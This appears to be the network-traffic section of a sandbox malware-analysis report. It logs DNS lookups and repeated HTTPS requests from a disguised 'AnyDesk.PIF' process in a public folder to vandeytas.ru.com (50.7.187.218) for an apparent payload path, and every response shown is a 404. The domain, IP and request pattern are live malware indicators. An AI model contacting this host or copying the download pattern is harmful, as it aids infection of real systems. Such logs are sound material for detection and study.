Nov 26, 2024 09:40:42.017607927 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.019361019 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.063332081 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.526945114 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.527026892 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.527101040 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.527503014 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.527523994 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.527537107 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.527543068 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.702955008 CET  49975        443        192.168.2.4     50.7.187.218
                                                    Nov 26, 2024 09:40:42.703011990 CET4434997550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.703078032 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.705502033 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.705619097 CET4434997550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.705677986 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.714773893 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.714814901 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.714895010 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.715262890 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.715279102 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.180831909 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.180953026 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.182497025 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.182502985 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.182740927 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.184566021 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.231322050 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722347021 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722429037 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722501040 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722796917 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722820044 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722834110 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722839117 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.894809961 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.894861937 CET4434998250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.894933939 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.895025969 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.895070076 CET4434998250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.895127058 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970489025 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970515013 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.970573902 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970968008 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970976114 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.387054920 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.387362003 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.388717890 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.388748884 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.389127016 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.393414974 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.439337015 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.905930996 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906107903 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906198025 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906322002 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906342030 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906435013 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906440973 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.073807955 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.073820114 CET4434998950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.073906898 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.074016094 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.074059010 CET4434998950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.074114084 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083383083 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083431005 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.083553076 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083801031 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083812952 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:48.493628025 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:48.493864059 CET49990443192.168.2.450.7.187.218
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 09:38:45.865753889 CET | 60440 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 09:38:46.865282059 CET | 53 | 60440 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 09:38:45.865753889 CET | 192.168.2.4 | 1.1.1.1 | 0xe4b2 | Standard query (0) | vandeytas.ru.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 09:38:46.865282059 CET | 1.1.1.1 | 192.168.2.4 | 0xe4b2 | No error (0) | vandeytas.ru.com | | 50.7.187.218 | A (IP address) | IN (0x0001) | false
                                                    • vandeytas.ru.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:48 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:38:49 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:38:48 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:38:49 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:50 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:38:51 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:38:51 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:38:51 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:52 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:38:53 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:38:53 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:38:53 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:55 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:38:55 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:38:55 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:38:55 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:57 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:38:58 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:38:57 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:38:58 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:38:59 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:39:00 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:39:00 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:00 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:39:02 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:39:02 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:39:02 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:02 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49748 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:39:04 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:39:05 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:39:04 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:05 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49752 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:39:06 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: vandeytas.ru.com
2024-11-26 08:39:07 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 26 Nov 2024 08:39:06 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:07 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    9           192.168.2.4  49755        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:08 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:09 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    10          192.168.2.4  49757        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:10 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:11 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:11 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    11          192.168.2.4  49759        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-11-26 08:39:12 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:13 UTC  164                IN         HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:13 GMT
                                                    Server: Apache
                                                    Content-Length: 315
